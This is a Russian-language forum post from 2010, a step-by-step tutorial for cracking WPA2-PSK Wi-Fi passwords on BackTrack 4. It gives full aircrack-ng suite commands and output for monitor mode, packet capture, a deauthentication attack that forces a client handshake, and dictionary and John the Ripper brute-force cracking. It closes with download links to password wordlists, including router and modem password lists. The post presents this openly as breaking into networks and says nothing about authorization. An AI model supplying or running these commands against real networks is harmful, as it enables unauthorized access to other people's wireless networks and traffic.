| kozel747 
                          Новичок  
                          Сообщений: 43
                          
                          
                             | 
                          
                            |  | 
                                « Ответ #8 : 28 Ноября 2010, 00:22:52 »
                               |  |  
 
                          взлом WPA.
 
 Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0.
 
 Во-первых, поставить карту в режиме мониторинга:
 
 ...............................................................
 
 root@bt:~# airmon-ng
 
 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)
 ath1            Atheros         madwifi-ng VAP (parent: wifi0)
 wlan0           Ralink 2573 USB rt73usb - [phy0]
 
 ...............................................................
 root@bt:~# airmon-ng start wlan0
 
 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)
 ath1            Atheros         madwifi-ng VAP (parent: wifi0)
 wlan0           Ralink 2573 USB rt73usb - [phy0]
 (monitor mode enabled on mon0)
 ................................................................
 
 Хорошо, теперь мы можем использовать интерфейс mon0
 
 Давайте найдём беспроводную сеть, которая использует WPA2 / PSK
 
 .................................................................
 
 root@bt:~# airodump-ng mon0
 
 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet
 
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet
 
 .....................................................................
 
 Остановим airodump-ng (ctrl+c) и запустим его снова,что-бы записать все пакеты на диск
 
 .....................................................................
 
 airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
 
 ........................................................................
 
 
 На данный момент, у вас есть 2 варианта: либо ждать, пока клиент подключится и 4-handshake будет полным, или deauthenticate существующих клиентов и таким образом заставить AP reassociate. Время-деньги, так что давайте заставим силой deauthenticate. Мы должны запустить aireplay-ng введя BSSID ЗС (-а) и МАС подключенного клиента (-с)
 
 .........................................................................
 
 root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
 
 13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
 
 13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
 
 .............................................................................
 
 Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу
 
 ..............................................................................
 
 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet
 
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230
 
 ................................................................................
 
 
 Остановитe airodump-ng и убедитесь, что файлы были созданы правильно
 
 ...............................................................................
 
 root@bt:/# ls /tmp/wpa2* -al
 
 -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
 
 -rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
 
 -rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
 
 ................................................................................
 
 Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени.
 
 Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt
 
 ................................................................................
 
 aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
 
 --------------------------------------------------------------------------------
 
 Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования:
 
 ..................................................................................
 
 root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
 
 .................................................................................
 
 каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA
 
 
 ----------------------------------------------------------------------------------------------------------------
 вот вам в помощь несколько словарей
 
 ComboFile   http://turbobit.net/m15prul3v4vt.html
 
 de-ice.net-1.110-1.0  http://turbobit.net/8jsypdjdkctf.html
 
 de-ice.net-1.100-1.1  http://turbobit.net/ej38m25xhrmt.html
 
 de-ice.net-2.100-1.1.part1  http://turbobit.net/0g2yjp1y77df.html
 
 de-ice.net-2.100-1.1.part2  http://turbobit.net/7cbyz8sxarh7.html
 
 роутеры и модемы Password List 2010-02-04  http://turbobit.net/fomdazyfg5ou.html
 
 theargonlistver1  http://turbobit.net/kjf1h2eoyb46.html
 
 webster-dictionary  http://turbobit.net/2xhh12xca0cy.html
 
 wpalist  http://turbobit.net/700uk6nvpren.html
 
 
 
 
 
 
 |